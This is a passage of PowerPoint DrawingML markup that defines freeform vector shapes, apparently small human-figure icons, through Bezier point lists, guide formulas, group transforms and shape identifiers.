                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119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72549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07" name="Freeform 855">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4686A84-F6EF-4B69-B89A-A1D45E090B2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52" y="1304"/>
                  <a:ext cx="109" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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08" name="Oval 856">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5060A766-1A9F-48C2-9B2C-6475C8CDB0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flipH="1">
                  <a:off x="2239" y="1204"/>
                  <a:ext cx="145" cy="145"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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86" name="Group 2083">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186FB2BF-9D44-4F8A-B203-475C17522E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93908" y="1725571"/>
              <a:ext cx="414338" cy="557213"/>
              <a:chOff x="1784" y="2648"/>
              <a:chExt cx="527" cy="707"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2182" name="Group 2084">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7AF1CC7-3138-46E1-BA31-74CD0B5FEE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8" y="2648"/>
                <a:ext cx="313" cy="629"/>
                <a:chOff x="1155" y="1032"/>
                <a:chExt cx="313" cy="629"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2196" name="Freeform 2085">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD1104D-7FF8-461C-A64E-351C6605EAB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297" y="1336"/>
                  <a:ext cx="120" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="89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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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5"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207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97" name="Freeform 2086">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C050CA-65C0-4766-955A-6B9247C49F6C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1155" y="1118"/>
                  <a:ext cx="313" cy="258"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 236"/>
                    <a:gd name="T1" fmla="*/ 114 h 194"/>
                    <a:gd name="T2" fmla="*/ 235 w 236"/>
                    <a:gd name="T3" fmla="*/ 114 h 194"/>
                    <a:gd name="T4" fmla="*/ 225 w 236"/>
                    <a:gd name="T5" fmla="*/ 49 h 194"/>
                    <a:gd name="T6" fmla="*/ 199 w 236"/>
                    <a:gd name="T7" fmla="*/ 24 h 194"/>
                    <a:gd name="T8" fmla="*/ 156 w 236"/>
                    <a:gd name="T9" fmla="*/ 13 h 194"/>
                    <a:gd name="T10" fmla="*/ 116 w 236"/>
                    <a:gd name="T11" fmla="*/ 2 h 194"/>
                    <a:gd name="T12" fmla="*/ 86 w 236"/>
                    <a:gd name="T13" fmla="*/ 12 h 194"/>
                    <a:gd name="T14" fmla="*/ 73 w 236"/>
                    <a:gd name="T15" fmla="*/ 86 h 194"/>
                    <a:gd name="T16" fmla="*/ 73 w 236"/>
                    <a:gd name="T17" fmla="*/ 86 h 194"/>
                    <a:gd name="T18" fmla="*/ 72 w 236"/>
                    <a:gd name="T19" fmla="*/ 91 h 194"/>
                    <a:gd name="T20" fmla="*/ 21 w 236"/>
                    <a:gd name="T21" fmla="*/ 104 h 194"/>
                    <a:gd name="T22" fmla="*/ 26 w 236"/>
                    <a:gd name="T23" fmla="*/ 135 h 194"/>
                    <a:gd name="T24" fmla="*/ 80 w 236"/>
                    <a:gd name="T25" fmla="*/ 122 h 194"/>
                    <a:gd name="T26" fmla="*/ 80 w 236"/>
                    <a:gd name="T27" fmla="*/ 122 h 194"/>
                    <a:gd name="T28" fmla="*/ 86 w 236"/>
                    <a:gd name="T29" fmla="*/ 120 h 194"/>
                    <a:gd name="T30" fmla="*/ 99 w 236"/>
                    <a:gd name="T31" fmla="*/ 112 h 194"/>
                    <a:gd name="T32" fmla="*/ 104 w 236"/>
                    <a:gd name="T33" fmla="*/ 92 h 194"/>
                    <a:gd name="T34" fmla="*/ 104 w 236"/>
                    <a:gd name="T35" fmla="*/ 92 h 194"/>
                    <a:gd name="T36" fmla="*/ 110 w 236"/>
                    <a:gd name="T37" fmla="*/ 47 h 194"/>
                    <a:gd name="T38" fmla="*/ 109 w 236"/>
                    <a:gd name="T39" fmla="*/ 167 h 194"/>
                    <a:gd name="T40" fmla="*/ 118 w 236"/>
                    <a:gd name="T41" fmla="*/ 178 h 194"/>
                    <a:gd name="T42" fmla="*/ 169 w 236"/>
                    <a:gd name="T43" fmla="*/ 192 h 194"/>
                    <a:gd name="T44" fmla="*/ 196 w 236"/>
                    <a:gd name="T45" fmla="*/ 173 h 194"/>
                    <a:gd name="T46" fmla="*/ 196 w 236"/>
                    <a:gd name="T47" fmla="*/ 160 h 194"/>
                    <a:gd name="T48" fmla="*/ 216 w 236"/>
                    <a:gd name="T49" fmla="*/ 155 h 194"/>
                    <a:gd name="T50" fmla="*/ 219 w 236"/>
                    <a:gd name="T51" fmla="*/ 154 h 194"/>
                    <a:gd name="T52" fmla="*/ 232 w 236"/>
                    <a:gd name="T53" fmla="*/ 146 h 194"/>
                    <a:gd name="T54" fmla="*/ 236 w 236"/>
                    <a:gd name="T55" fmla="*/ 124 h 194"/>
                    <a:gd name="T56" fmla="*/ 235 w 236"/>
                    <a:gd name="T57" fmla="*/ 114 h 194"/>
                    <a:gd name="T58" fmla="*/ 192 w 236"/>
                    <a:gd name="T59" fmla="*/ 75 h 194"/>
                    <a:gd name="T60" fmla="*/ 194 w 236"/>
                    <a:gd name="T61" fmla="*/ 88 h 194"/>
                    <a:gd name="T62" fmla="*/ 200 w 236"/>
                    <a:gd name="T63" fmla="*/ 123 h 194"/>
                    <a:gd name="T64" fmla="*/ 196 w 236"/>
                    <a:gd name="T65" fmla="*/ 124 h 194"/>
                    <a:gd name="T66" fmla="*/ 194 w 236"/>
                    <a:gd name="T67" fmla="*/ 88 h 194"/>
                    <a:gd name="T68" fmla="*/ 192 w 236"/>
                    <a:gd name="T69" fmla="*/ 75 h 194"/>
                    <a:gd name="T70" fmla="*/ 192 w 236"/>
                    <a:gd name="T71" fmla="*/ 71 h 194"/>
                    <a:gd name="T72" fmla="*/ 192 w 236"/>
                    <a:gd name="T73" fmla="*/ 75 h 1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6" h="194">
                      <a:moveTo>
                        <a:pt x="235" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="85"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="32"/>
                        <a:pt x="207" y="27"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="89" y="4"/>
                        <a:pt x="86" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="28" y="103"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="65"/>
                        <a:pt x="110" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="125"/>
                        <a:pt x="109" y="167"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="172"/>
                        <a:pt x="112" y="177"/>
                        <a:pt x="118" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="180"/>
                        <a:pt x="162" y="190"/>
                        <a:pt x="169" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="194"/>
                        <a:pt x="193" y="184"/>
                        <a:pt x="196" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="171"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="208" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="155"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="142"/>
                        <a:pt x="236" y="135"/>
                        <a:pt x="236" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="192" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="97"/>
                        <a:pt x="197" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="123"/>
                        <a:pt x="197" y="124"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="192" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="7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98" name="Freeform 2087">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3063C0B2-1562-47D6-8349-3C76AB888AC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312" y="1102"/>
                  <a:ext cx="87" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29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6" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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99" name="Freeform 2088">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BB8A4F-87FE-4D1D-9E91-6D3AADF5790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321" y="1281"/>
                  <a:ext cx="121" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 27 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="9"/>
                        <a:pt x="27" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="65" y="38"/>
                        <a:pt x="91" y="32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00" name="Oval 2089">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52CC0991-665B-4F10-B9E6-BAF6C17155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flipH="1">
                  <a:off x="1302" y="1032"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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83" name="Group 2090">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCCCE31-9187-44BC-848F-307D294FB4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4" y="2727"/>
                <a:ext cx="339" cy="628"/>
                <a:chOff x="804" y="1033"/>
                <a:chExt cx="339" cy="628"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2184" name="Group 2091">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305D4A1A-E528-46A1-BFD7-4443261CE8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85" y="1121"/>
                  <a:ext cx="258" cy="202"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2193" name="Freeform 2092">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE965D6-5809-4DFC-8AED-A37CA6B1E1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94" name="Freeform 2093">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63135AB-534A-40F6-AC85-A19970E651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95" name="Freeform 2094">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F67F8F2-137E-4CCA-819D-E366FC46F1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315" y="1589"/>
                    <a:ext cx="297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85" name="Group 2095">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C820BED-414C-47C8-BDD3-BC87FDC906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04" y="1034"/>
                  <a:ext cx="301" cy="627"/>
                  <a:chOff x="2966" y="2390"/>
                  <a:chExt cx="413" cy="859"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2189" name="Freeform 2096">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5679F18-1C5D-4D20-8D0F-0D6A60939F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 flipH="1">
                    <a:off x="2966" y="2503"/>
                    <a:ext cx="413" cy="349"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 186 w 226"/>
                      <a:gd name="T1" fmla="*/ 107 h 191"/>
                      <a:gd name="T2" fmla="*/ 164 w 226"/>
                      <a:gd name="T3" fmla="*/ 113 h 191"/>
                      <a:gd name="T4" fmla="*/ 154 w 226"/>
                      <a:gd name="T5" fmla="*/ 49 h 191"/>
                      <a:gd name="T6" fmla="*/ 128 w 226"/>
                      <a:gd name="T7" fmla="*/ 24 h 191"/>
                      <a:gd name="T8" fmla="*/ 85 w 226"/>
                      <a:gd name="T9" fmla="*/ 13 h 191"/>
                      <a:gd name="T10" fmla="*/ 45 w 226"/>
                      <a:gd name="T11" fmla="*/ 2 h 191"/>
                      <a:gd name="T12" fmla="*/ 15 w 226"/>
                      <a:gd name="T13" fmla="*/ 12 h 191"/>
                      <a:gd name="T14" fmla="*/ 2 w 226"/>
                      <a:gd name="T15" fmla="*/ 85 h 191"/>
                      <a:gd name="T16" fmla="*/ 2 w 226"/>
                      <a:gd name="T17" fmla="*/ 85 h 191"/>
                      <a:gd name="T18" fmla="*/ 1 w 226"/>
                      <a:gd name="T19" fmla="*/ 89 h 191"/>
                      <a:gd name="T20" fmla="*/ 1 w 226"/>
                      <a:gd name="T21" fmla="*/ 89 h 191"/>
                      <a:gd name="T22" fmla="*/ 8 w 226"/>
                      <a:gd name="T23" fmla="*/ 106 h 191"/>
                      <a:gd name="T24" fmla="*/ 23 w 226"/>
                      <a:gd name="T25" fmla="*/ 106 h 191"/>
                      <a:gd name="T26" fmla="*/ 29 w 226"/>
                      <a:gd name="T27" fmla="*/ 105 h 191"/>
                      <a:gd name="T28" fmla="*/ 29 w 226"/>
                      <a:gd name="T29" fmla="*/ 105 h 191"/>
